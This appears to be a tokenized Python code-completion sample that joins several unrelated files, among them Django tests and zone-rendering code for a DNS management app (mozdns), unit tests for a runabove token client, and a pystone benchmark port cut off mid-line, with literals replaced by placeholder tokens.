do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : <EOL> osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : <EOL> osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : <EOL> self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> def test_no_type ( self ) : <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : '<STR_LIT>' } <EOL> rec = AddressRecord ( label = data [ '<STR_LIT:label>' ] , domain = data [ <EOL> '<STR_LIT>' ] , ip_str = data [ '<STR_LIT>' ] , ip_type = '<STR_LIT:x>' ) <EOL> self . assertRaises ( ValidationError , rec . save ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : '<STR_LIT>' } <EOL> rec = AddressRecord ( <EOL> label = data [ '<STR_LIT:label>' ] , domain = data [ '<STR_LIT>' ] , ip_str = data [ '<STR_LIT>' ] ) <EOL> self . assertRaises ( ValidationError , rec . save ) <EOL> def test_bad_A_ip ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : <NUM_LIT> } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . 
do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> def test_bad_AAAA_ip ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : <EOL> <NUM_LIT> } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> def test_add_A_records_exist ( self ) : <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . do_add_record ( data ) <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> def test_add_AAAA_records_exist ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . f_o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . 
o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . do_add_record6 ( data ) <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> def test_add_A_invalid_address_records ( self ) : <EOL> data = { '<STR_LIT:label>' : "<STR_LIT>" , '<STR_LIT>' : self . e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : "<STR_LIT:foo>" , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : <EOL> "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , <EOL> '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . 
do_add_record , data ) <EOL> def test_add_AAAA_invalid_address_records ( self ) : <EOL> osu_block = "<STR_LIT>" <EOL> boot_strap_ipv6_reverse_domain ( "<STR_LIT>" ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : <EOL> osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , <EOL> '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : <EOL> osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> data = { '<STR_LIT:label>' : '<STR_LIT>' , '<STR_LIT>' : self . o_e , '<STR_LIT>' : osu_block + "<STR_LIT>" } <EOL> self . assertRaises ( ValidationError , self . do_add_record6 , data ) <EOL> def test_no_update_when_glue ( self ) : <EOL> """<STR_LIT>""" <EOL> label = '<STR_LIT>' <EOL> glue = AddressRecord ( label = label , domain = self . o_e , <EOL> ip_str = '<STR_LIT>' , ip_type = '<STR_LIT:4>' ) <EOL> glue . save ( ) <EOL> server = "<STR_LIT>" % ( label , self . o_e ) <EOL> ns = Nameserver ( domain = self . o_e , server = server ) <EOL> ns . save ( ) <EOL> self . assertTrue ( ns . glue == glue ) <EOL> glue . label = "<STR_LIT>" <EOL> self . 
assertRaises ( ValidationError , glue . save ) <EOL> glue . domain = self . m_o_e <EOL> self . assertRaises ( ValidationError , glue . save ) <EOL> glue = AddressRecord . objects . get ( pk = glue . pk ) <EOL> glue . label = "<STR_LIT>" <EOL> glue . domain = self . e <EOL> self . assertRaises ( ValidationError , glue . save ) <EOL> glue = AddressRecord . objects . get ( pk = glue . pk ) <EOL> glue . ip_str = "<STR_LIT>" <EOL> glue . save ( ) <EOL> def test_delete_with_cname_pointing_to_a ( self ) : <EOL> label = '<STR_LIT>' <EOL> a = AddressRecord ( label = label , domain = self . o_e , ip_str = <EOL> '<STR_LIT>' , ip_type = '<STR_LIT:4>' ) <EOL> a . clean ( ) <EOL> a . save ( ) <EOL> cn = CNAME ( label = "<STR_LIT>" , domain = self . o_e , target = label + "<STR_LIT:.>" + <EOL> self . o_e . name ) <EOL> cn . clean ( ) <EOL> cn . save ( ) <EOL> self . assertRaises ( ValidationError , a . delete ) <EOL> a . delete ( check_cname = False ) </s>
<s> from django . db . models import Q <EOL> from mozdns . address_record . models import AddressRecord <EOL> from mozdns . cname . models import CNAME <EOL> from mozdns . mx . models import MX <EOL> from mozdns . nameserver . models import Nameserver <EOL> from mozdns . ptr . models import PTR <EOL> from mozdns . srv . models import SRV <EOL> from mozdns . txt . models import TXT <EOL> from mozdns . sshfp . models import SSHFP <EOL> from mozdns . view . models import View <EOL> from core . interface . static_intr . models import StaticInterface <EOL> from gettext import gettext as _ <EOL> from core . utils import fail_mail <EOL> DEFAULT_TTL = <NUM_LIT> <EOL> def render_soa_only ( soa , root_domain ) : <EOL> BUILD_STR = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( <EOL> ttl = soa . ttl , <EOL> root_domain = root_domain . name , primary = soa . primary , <EOL> contact = soa . contact , refresh = str ( soa . refresh ) , <EOL> retry = str ( soa . retry ) , expire = str ( soa . expire ) , <EOL> minimum = soa . minimum ) ) <EOL> return BUILD_STR <EOL> def render_rdtype ( rdtype_set , ** kwargs ) : <EOL> BUILD_STR = "<STR_LIT>" <EOL> for obj in rdtype_set : <EOL> BUILD_STR += _ ( obj . 
bind_render_record ( ** kwargs ) + "<STR_LIT:\n>" ) <EOL> return BUILD_STR <EOL> def _render_forward_zone ( default_ttl , nameserver_set , mx_set , <EOL> addressrecord_set , interface_set , cname_set , srv_set , <EOL> txt_set , sshfp_set ) : <EOL> BUILD_STR = "<STR_LIT>" <EOL> BUILD_STR += render_rdtype ( nameserver_set ) <EOL> BUILD_STR += render_rdtype ( mx_set ) <EOL> BUILD_STR += render_rdtype ( txt_set ) <EOL> BUILD_STR += render_rdtype ( sshfp_set ) <EOL> BUILD_STR += render_rdtype ( srv_set ) <EOL> BUILD_STR += render_rdtype ( cname_set ) <EOL> BUILD_STR += render_rdtype ( interface_set , rdtype = '<STR_LIT:A>' ) <EOL> BUILD_STR += render_rdtype ( addressrecord_set ) <EOL> return BUILD_STR <EOL> def render_forward_zone ( view , mega_filter ) : <EOL> data = _render_forward_zone ( <EOL> default_ttl = DEFAULT_TTL , <EOL> nameserver_set = Nameserver . objects . filter ( mega_filter ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' ) , <EOL> mx_set = MX . objects . filter ( mega_filter ) . filter ( views__name = view . name <EOL> ) . order_by ( '<STR_LIT>' ) , <EOL> addressrecord_set = AddressRecord . objects . filter ( mega_filter ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> interface_set = StaticInterface . objects . filter ( <EOL> mega_filter , dns_enabled = True ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> cname_set = CNAME . objects . filter ( mega_filter ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' ) , <EOL> srv_set = SRV . objects . filter ( mega_filter ) . filter ( views__name = view . name <EOL> ) . order_by ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> txt_set = TXT . objects . filter ( mega_filter ) . filter ( views__name = view . name <EOL> ) . 
order_by ( <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> sshfp_set = SSHFP . objects . filter ( mega_filter ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> return data <EOL> def _render_reverse_zone ( default_ttl , nameserver_set , interface_set , ptr_set ) : <EOL> BUILD_STR = '<STR_LIT>' <EOL> BUILD_STR += render_rdtype ( nameserver_set ) <EOL> BUILD_STR += render_rdtype ( ptr_set ) <EOL> BUILD_STR += render_rdtype ( interface_set , reverse = True , rdtype = '<STR_LIT>' ) <EOL> return BUILD_STR <EOL> def render_reverse_zone ( view , domain_mega_filter , rdomain_mega_filter ) : <EOL> data = _render_reverse_zone ( <EOL> default_ttl = DEFAULT_TTL , <EOL> nameserver_set = Nameserver . objects . filter ( domain_mega_filter ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' ) , <EOL> interface_set = StaticInterface . objects . filter ( <EOL> rdomain_mega_filter , dns_enabled = True ) . filter ( <EOL> views__name = view . name ) . order_by ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:label>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ptr_set = PTR . objects . filter ( rdomain_mega_filter ) . filter ( <EOL> views__name = view . name ) . order_by ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ) <EOL> return data <EOL> def build_zone_data ( view , root_domain , soa , logf = None ) : <EOL> """<STR_LIT>""" <EOL> ztype = '<STR_LIT>' if root_domain . is_reverse else '<STR_LIT>' <EOL> if ( soa . has_record_set ( view = view , exclude_ns = True ) and <EOL> not root_domain . nameserver_set . filter ( views = view ) . exists ( ) ) : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( root_domain , view . name ) ) <EOL> fail_mail ( msg , subject = "<STR_LIT>" ) <EOL> logf ( '<STR_LIT>' , msg ) <EOL> return '<STR_LIT>' <EOL> domains = soa . domain_set . all ( ) . 
order_by ( '<STR_LIT:name>' ) <EOL> domain_mega_filter = Q ( domain = root_domain ) <EOL> for domain in domains : <EOL> domain_mega_filter = domain_mega_filter | Q ( domain = domain ) <EOL> rdomain_mega_filter = Q ( reverse_domain = root_domain ) <EOL> for reverse_domain in domains : <EOL> rdomain_mega_filter = rdomain_mega_filter | Q ( <EOL> reverse_domain = reverse_domain ) <EOL> soa_data = render_soa_only ( soa = soa , root_domain = root_domain ) <EOL> try : <EOL> if ztype == "<STR_LIT>" : <EOL> view_data = render_forward_zone ( view , domain_mega_filter ) <EOL> else : <EOL> view_data = render_reverse_zone ( view , domain_mega_filter , <EOL> rdomain_mega_filter ) <EOL> except View . DoesNotExist : <EOL> view_data = "<STR_LIT>" <EOL> if view_data : <EOL> view_data = soa_data + view_data <EOL> return view_data </s>
<s> from mozdns . utils import slim_form <EOL> from base . base . views import BaseListView , BaseDetailView , BaseCreateView <EOL> from base . base . views import BaseUpdateView , BaseDeleteView <EOL> class MozdnsListView ( BaseListView ) : <EOL> """<STR_LIT:U+0020>""" <EOL> template_name = '<STR_LIT>' <EOL> class MozdnsDetailView ( BaseDetailView ) : <EOL> """<STR_LIT:U+0020>""" <EOL> template_name = '<STR_LIT>' <EOL> class MozdnsCreateView ( BaseCreateView ) : <EOL> """<STR_LIT:U+0020>""" <EOL> template_name = '<STR_LIT>' <EOL> def get_form ( self , form_class ) : <EOL> form = super ( MozdnsCreateView , self ) . get_form ( form_class ) <EOL> domain_pk = self . kwargs . get ( '<STR_LIT>' , False ) <EOL> if domain_pk : <EOL> form = slim_form ( domain_pk = domain_pk , form = form ) <EOL> reverse_domain_pk = self . kwargs . get ( '<STR_LIT>' , False ) <EOL> if reverse_domain_pk : <EOL> slim_form ( reverse_domain_pk = reverse_domain_pk , form = form ) <EOL> """<STR_LIT>""" <EOL> remove_message = unicode ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for field in form . fields : <EOL> if field in form . base_fields : <EOL> if form . base_fields [ field ] . help_text : <EOL> new_text = form . base_fields [ field ] . help_text . replace ( <EOL> remove_message , '<STR_LIT>' ) <EOL> new_text = new_text . strip ( ) <EOL> form . base_fields [ field ] . help_text = new_text <EOL> return form <EOL> class MozdnsUpdateView ( BaseUpdateView ) : <EOL> template_name = '<STR_LIT>' <EOL> def get_form ( self , form_class ) : <EOL> form = super ( MozdnsUpdateView , self ) . get_form ( form_class ) <EOL> """<STR_LIT>""" <EOL> remove_message = unicode ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> for field in form . fields : <EOL> if field in form . base_fields : <EOL> if form . base_fields [ field ] . help_text : <EOL> new_text = form . base_fields [ field ] . help_text . replace ( <EOL> remove_message , '<STR_LIT>' ) <EOL> new_text = new_text . strip ( ) <EOL> form . base_fields [ field ] . 
help_text = new_text <EOL> return form <EOL> class MozdnsDeleteView ( BaseDeleteView ) : <EOL> """<STR_LIT:U+0020>""" <EOL> template_name = '<STR_LIT>' <EOL> succcess_url = '<STR_LIT>' </s>
<s> """<STR_LIT:U+0020>""" <EOL> __version__ = '<STR_LIT>' <EOL> setproctitle = lambda v : NotImplemented <EOL> try : <EOL> from setproctitle import setproctitle <EOL> except ImportError : <EOL> try : <EOL> from procname import setprocname as setproctitle <EOL> except ImportError : <EOL> pass </s>
<s> if __name__ == '<STR_LIT:__main__>' : <EOL> import nose <EOL> try : <EOL> import rednose <EOL> except ImportError : <EOL> argv = None <EOL> else : <EOL> argv = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> nose . main ( argv = argv ) </s>
<s> __version__ = '<STR_LIT>' </s>
<s> import unittest <EOL> import mock <EOL> import json <EOL> import runabove <EOL> class TestToken ( unittest . TestCase ) : <EOL> answer_token = '''<STR_LIT>''' <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def setUp ( self , mock_wrapper ) : <EOL> self . mock_wrapper = mock_wrapper <EOL> self . token = runabove . token . TokenManager ( mock_wrapper , None ) <EOL> def test_base_path ( self ) : <EOL> self . assertEquals ( self . token . basepath , '<STR_LIT>' ) <EOL> def test_token_existance ( self ) : <EOL> self . mock_wrapper . get . return_value = json . loads ( self . answer_token ) <EOL> token = self . token . get ( ) <EOL> self . assertIsInstance ( token , runabove . token . Token ) <EOL> class TestTokenObject ( unittest . TestCase ) : <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def setUp ( self , mock_tokens ) : <EOL> self . mock_tokens = mock_tokens <EOL> mock_token = json . loads ( TestToken . answer_token ) <EOL> self . token = runabove . token . Token ( <EOL> self . mock_tokens , <EOL> mock_token [ '<STR_LIT>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT:user>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , <EOL> ) <EOL> def test_init ( self ) : <EOL> mock_token = json . loads ( TestToken . answer_token ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] , self . token . auth_token ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT:user>' ] , self . token . user ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . token . roles ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . token . project ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . token . catalog ) <EOL> self . 
assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . token . methods ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . token . issued_at ) <EOL> self . assertEqual ( mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] , self . token . expires_at ) <EOL> def test_get_endpoint ( self ) : <EOL> mock_token = json . loads ( TestToken . answer_token ) <EOL> self . assertEqual ( <EOL> mock_token [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ <NUM_LIT:1> ] , <EOL> self . token . get_endpoint ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> self . assertRaises ( KeyError , self . token . get_endpoint , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertRaises ( KeyError , self . token . get_endpoint , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> '''<STR_LIT>''' <EOL> from time import clock <EOL> __version__ = "<STR_LIT>" <EOL> from runtime import * <EOL> def main ( ) : <EOL> LOOPS = <NUM_LIT> <EOL> a = pystones ( LOOPS ) <EOL> benchtime = a [ <NUM_LIT:0> ] <EOL> stones = a [ <NUM_LIT:1> ] <EOL> print ( stones ) <EOL> def pystones ( loops ) : <EOL> return Proc0 ( loops ) <EOL> class Record : <EOL> def __init__ ( self , PtrComp = None , Discr = <NUM_LIT:0> , EnumComp = <NUM_LIT:0> , IntComp = <NUM_LIT:0> , StringComp = <NUM_LIT:0> ) : <EOL> self . PtrComp = PtrComp <EOL> self . Discr = Discr <EOL> self . EnumComp = EnumComp <EOL> self . IntComp = IntComp <EOL> self . StringComp = StringComp <EOL> def copy ( self ) : <EOL> return Record ( <EOL> PtrComp = self . PtrComp , <EOL> Discr = self . Discr , <EOL> EnumComp = self . EnumComp , <EOL> IntComp = self . IntComp , <EOL> StringComp = self . StringComp <EOL> ) <EOL> TRUE = <NUM_LIT:1> <EOL> FALSE = <NUM_LIT:0> <EOL> IntGlob = <NUM_LIT:0> <EOL> BoolGlob = FALSE <EOL> Char1Glob = '<STR_LIT>' <EOL> Char2Glob = '<STR_LIT>' <EOL> PtrGlb = None <EOL> PtrGlbNext = None <EOL> Ident1 = <NUM_LIT:1> <EOL> Ident2 = <NUM_LIT:2> <EOL> Ident3 = <NUM_LIT:3> <EOL> Ident4 = <NUM_LIT:4> <EOL> Ident5 = <NUM_LIT:5> <EOL> def create_array2glob ( n ) : <EOL> return [ Array1Glob [ : ] for i in range ( n ) ] <EOL> Array1Glob = [ <NUM_LIT:0> ] * <NUM_LIT> <EOL> Array2Glob = create_array2glob ( <NUM_LIT> ) <EOL> def Proc0 ( loops ) : <EOL> global IntGlob <EOL> global BoolGlob <EOL> global Char1Glob <EOL> global Char2Glob <EOL> global Array1Glob <EOL> global Array2Glob <EOL> global PtrGlb <EOL> global PtrGlbNext <EOL> starttime = clock ( ) <EOL> PtrGlbNext = Record ( PtrComp = None , Discr = <NUM_LIT:0> , EnumComp = <NUM_LIT:0> , IntComp = <NUM_LIT:0> , StringComp = <NUM_LIT:0> ) <EOL> PtrGlb = Record ( <EOL> PtrComp = PtrGlbNext , <EOL> Discr = Ident1 , <EOL> EnumComp = Ident3 , <EOL> IntComp = <NUM_LIT> , <EOL> StringComp = "<STR_LIT>" <EOL> ) <EOL> String1Loc = "<STR_LIT>" <EOL> 
Array2Glob [ <NUM_LIT:8> ] [ <NUM_LIT:7> ] = <NUM_LIT:10> <EOL> for i in range ( loops ) : <EOL> Proc5 ( ) <EOL> Proc4 ( ) <EOL> IntLoc1 = <NUM_LIT:2> <EOL> IntLoc2 = <NUM_LIT:3> <EOL> String2Loc = "<STR_LIT>" <EOL> EnumLoc = Ident2 <EOL> BoolGlob = not Func2 ( String1Loc , String2Loc ) <EOL> while IntLoc1 < IntLoc2 : <EOL> IntLoc3 = <NUM_LIT:5> * IntLoc1 - IntLoc2 <EOL> IntLoc3 = Proc7 ( IntLoc1 , IntLoc2 ) <EOL> IntLoc1 = IntLoc1 + <NUM_LIT:1> <EOL> Proc8 ( Array1Glob , Array2Glob , IntLoc1 , IntLoc3 ) <EOL> PtrGlb = Proc1 ( PtrGlb ) <EOL> CharIndex = '<STR_LIT:A>' <EOL> while CharIndex <= Char2Glob : <EOL> if EnumLoc == Func1 ( CharIndex , '<STR_LIT:C>' ) : <EOL> EnumLoc = Proc6 ( Ident1 ) <EOL> CharIndex = chr ( ord ( CharIndex ) + <NUM_LIT:1> ) <EOL> IntLoc3 = IntLoc2 * IntLoc1 <EOL> IntLoc2 = IntLoc3 / IntLoc1 <EOL> IntLoc2 = <NUM_LIT:7> * ( IntLoc3 - IntLoc2 ) - IntLoc1 <EOL> IntLoc1 = Proc2 ( IntLoc1 ) <EOL> benchtime = clock ( ) - starttime <EOL> if benchtime == <NUM_LIT:0.0> : <EOL> loopsPerBenchtime = <NUM_LIT:0.0> <EOL> else : <EOL> loopsPerBenchtime = ( loops / benchtime ) <EOL> return benchtime , loopsPerBenchtime <EOL> def Proc1 ( PtrParIn ) : <EOL> NextRecord = PtrGlb . copy ( ) <EOL> PtrParIn . PtrComp = NextRecord <EOL> PtrParIn . IntComp = <NUM_LIT:5> <EOL> NextRecord . IntComp = PtrParIn . IntComp <EOL> NextRecord . PtrComp = PtrParIn . PtrComp <EOL> NextRecord . PtrComp = Proc3 ( NextRecord . PtrComp ) <EOL> if NextRecord . Discr == Ident1 : <EOL> NextRecord . IntComp = <NUM_LIT:6> <EOL> NextRecord . EnumComp = Proc6 ( PtrParIn . EnumComp ) <EOL> NextRecord . PtrComp = PtrGlb . PtrComp <EOL> NextRecord . IntComp = Proc7 ( NextRecord . IntComp , <NUM_LIT:10> ) <EOL> else : <EOL> PtrParIn = NextRecord . copy ( ) <EOL> NextRecord . 
PtrComp = None <EOL> return PtrParIn <EOL> def Proc2 ( IntParIO ) : <EOL> IntLoc = IntParIO + <NUM_LIT:10> <EOL> while True : <EOL> if Char1Glob == '<STR_LIT:A>' : <EOL> IntLoc = IntLoc - <NUM_LIT:1> <EOL> IntParIO = IntLoc - IntGlob <EOL> EnumLoc = Ident1 <EOL> if EnumLoc == Ident1 : <EOL> break <EOL> return IntParIO <EOL> def Proc3 ( PtrParOut ) : <EOL> global IntGlob <EOL> if PtrGlb is not None : <EOL> PtrParOut = PtrGlb . PtrComp <EOL> else : <EOL> IntGlob = <NUM_LIT:100> <EOL> PtrGlb . IntComp = Proc7 ( <NUM_LIT:10> , IntGlob ) <EOL> return PtrParOut <EOL> def Proc4 ( ) : <EOL> global Char2Glob <EOL> BoolLoc = Char1Glob == '<STR_LIT:A>' <EOL> BoolLoc = BoolLoc or BoolGlob <EOL> Char2Glob = '<STR_LIT:B>' <EOL> def Proc5 ( ) : <EOL> global Char1Glob <EOL> global BoolGlob <EOL> Char1Glob = '<STR_LIT:A>' <EOL> BoolGlob = FALSE <EOL> def Proc6 ( EnumParIn ) : <EOL> EnumParOut = EnumParIn <EOL> if not Func3 ( EnumParIn ) : <EOL> EnumParOut = Ident4 <EOL> if EnumParIn == Ident1 : <EOL> EnumParOut = Ident1 <EOL> elif EnumParIn == Ident2 : <EOL> if IntGlob > <NUM_LIT:100> : <EOL> EnumParOut = Ident1 <EOL> else : <EOL> EnumParOut = Ident4 <EOL> elif EnumParIn == Ident3 : <EOL> EnumParOut = Ident2 <EOL> elif EnumParIn == Ident4 : <EOL> pass <EOL> elif EnumParIn == Ident5 : <EOL> EnumParOut = Ident3 <EOL> return EnumParOut <EOL> def Proc7 ( IntParI1 , IntParI2 ) : <EOL> IntLoc = IntParI1 + <NUM_LIT:2> <EOL> IntParOut = IntParI2 + IntLoc <EOL> return IntParOut <EOL> def Proc8 ( Array1Par , Array2Par , IntParI1 , IntParI2 ) : <EOL> global IntGlob <EOL> IntLoc = IntParI1 + <NUM_LIT:5> <EOL> Array1Par [ IntLoc ] = IntParI2 <EOL> Array1Par [ IntLoc + <NUM_LIT:1> ] = Array1Par [ IntLoc ] <EOL> Array1Par [ IntLoc + <NUM_LIT:30> ] = IntLoc <EOL> for IntIndex in range ( IntLoc , IntLoc + <NUM_LIT:2> ) : <EOL> Array2Par [ IntLoc ] [ IntIndex ] = IntLoc <EOL> Array2Par [ IntLoc ] [ IntLoc - <NUM_LIT:1> ] = Array2Par [ IntLoc ] [ IntLoc - <NUM_LIT:1> ] + <NUM_LIT:1> <EOL> Array2Par [ 
